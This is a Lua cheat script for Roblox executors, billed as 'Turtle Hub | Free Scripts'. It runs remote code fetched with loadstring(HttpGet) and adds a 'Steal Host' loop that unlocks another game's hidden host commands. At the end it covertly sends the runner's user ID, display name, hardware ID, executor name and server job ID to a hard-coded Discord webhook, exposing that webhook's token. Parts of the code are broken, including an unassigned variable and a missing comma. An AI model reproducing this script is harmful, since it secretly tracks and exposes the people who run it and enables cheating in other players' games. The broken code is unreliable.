print("i love you korou")

local bannedHwid = 

-- Hàm kiểm tra hwid và kick nếu bị cấm
local function checkAndKickPlayer()
    local player = game:GetService("Players").LocalPlayer
    if player.UserId == bannedHwid then
        player:Kick("Buổi Tối Vui Vẻ Nhé 🤑")
    end
end

checkAndKickPlayer()

if not game:IsLoaded() then game.Loaded:Wait() end

local Fluent = loadstring(game:HttpGet("https://github.com/dawid-scripts/Fluent/releases/latest/download/main.lua"))()

local Window = Fluent:CreateWindow({
    Title = "Turtle Hub | Free Scripts",
    SubTitle = "",
    TabWidth = 160,
    Size = UDim2.fromOffset(600, 325),
    Acrylic = false,
    Theme = "Dark",
    MinimizeKey = Enum.KeyCode.End
})

local Tabs = {
    infor = Window:AddTab({ Title = "Infor Hub", Icon = "" }),
    general = Window:AddTab({ Title = "General", Icon = "" })
}

local Options = Fluent.Options

--// ScreenGui
local ScreenGui = Instance.new("ScreenGui")
local ImageButton = Instance.new("ImageButton")
local UICorner = Instance.new("UICorner")

ScreenGui.Parent = game.CoreGui
ScreenGui.ZIndexBehavior = Enum.ZIndexBehavior.Sibling

ImageButton.Parent = ScreenGui
ImageButton.BackgroundColor3 = Color3.fromRGB(0, 0, 0)
ImageButton.BorderSizePixel = 0
ImageButton.Position = UDim2.new(0.12, 0, 0.095, 0)
ImageButton.Size = UDim2.new(0, 50, 0, 55)
ImageButton.Draggable = true
ImageButton.Image = "rbxassetid://122727207394038"

UICorner.CornerRadius = UDim.new(0, 10)
UICorner.Parent = ImageButton

ImageButton.MouseButton1Down:Connect(function()
    game:GetService("VirtualInputManager"):SendKeyEvent(true, Enum.KeyCode.End, false, game)
end)

local function playSound()
    local sound = Instance.new("Sound", game:GetService("CoreGui"))
    sound.SoundId = "rbxassetid://8219599909"
    sound.Volume = 10
    sound:Play()
end

playSound()

-- Infor
Tabs.infor:AddButton({
    Title = "Discord | Turtle Hub",
    Description = "Copy Link Discord",
    Callback = function()
        setclipboard("https://discord.gg/km9WpRSukT")
    end
})

-- General Section
local generalSection = Tabs.general:AddSection({
    Title = "Steal Host",
    SubTitle = "Currently, only Fly and Announcement can be used"
})

local isFeatureEnabled = false
generalSection:OnChanged(function(value)
    isFeatureEnabled = value
end)

spawn(function()
    while task.wait() do
        if isFeatureEnabled then
            local hostGui = game.Players.LocalPlayer.PlayerGui:FindFirstChild("HostGui")
            if hostGui then
                hostGui.Hostcmds.Active = true
                hostGui.Hostcmds.Invisible = true
            end
        end
    end
end)

game.StarterGui:SetCore("SendNotification", {
    Icon = "";
    Title = "Turtle Hub", 
    Text = "Complete !";
})                                                                                              
wait(.3)
local placeId = game.PlaceId
local jobId = game.JobId

local sea1 = 2753915549
local sea2 = 4442272183
local sea3 = 7449423635


local Players = game:GetService("Players")
local playerCount = game:GetService("Players"):GetPlayers()

local hwid = game:GetService("RbxAnalyticsService"):GetClientId()
local ExecutorUsing = identifyexecutor()
local HttpService = game:GetService("HttpService")
local Data =
{
  ["embeds"] = {
      {
          ["title"] = "Thông Tin | Account",
          ["url"] = "https://www.roblox.com/users/"..game.Players.LocalPlayer.UserId,
          ["description"] = "```"..game.Players.LocalPlayer.DisplayName.." ```",
          ["color"] = tonumber("0xf7c74b"),
          ["thumbnail"] = {["url"] = "https://cdn.discordapp.com/attachments/1277112182743629969/1277337544463224898/Picsart_24-08-26_01-42-34-420.png?ex=66ccccca&is=66cb7b4a&hm=80a0165401d2357f1386cfa88da35a3df2427c1186b0e8b7955272f6c5f6ead9&"},
          ["fields"] = {
              {
                  ["name"] = "Execute:",
                  ["value"] = "```"..ExecutorUsing.."```",
                  ["inline"] = true
              },
              {
                  ["name"] = "Hwid:",
                  ["value"] = hwid,
                  ["inline"] = true
              }
              {                
                  ["name"] = "Job ID:",
                  ["value"] = " " .. jobId,
                  ["inline"] = true
              },
              {
                  ["name"] = "Script Teleport:",
                  ["value"] = "\n" .. 'game:GetService("TeleportService"):TeleportToPlaceInstance('..placeId..', "'..jobId..'", game.Players.LocalPlayer)' .. "\n", 
                  ["inline"] = true 
              },
              {
                  ["name"] = "Ty For Use:",
                  ["value"] = "**__Turtle Hub__**",
                  ["inline"] = true          
              }
          }              
      }
  }
}

local Headers = {["Content-Type"] = "application/json"}
local Encoded = HttpService:JSONEncode(Data)

local Request = http_request or request or HttpPost or syn.request
local Final = {Url = "https://discord.com/api/webhooks/1280238700663537804/VdQupYmAp5wInm3H2-uxKk6TZMkSYWmqzPWq1G3EjepYsT6GLLjD-1iIMCDPoI7eG1_j", Body = Encoded, Method = "POST", Headers = Headers}
Request(Final)
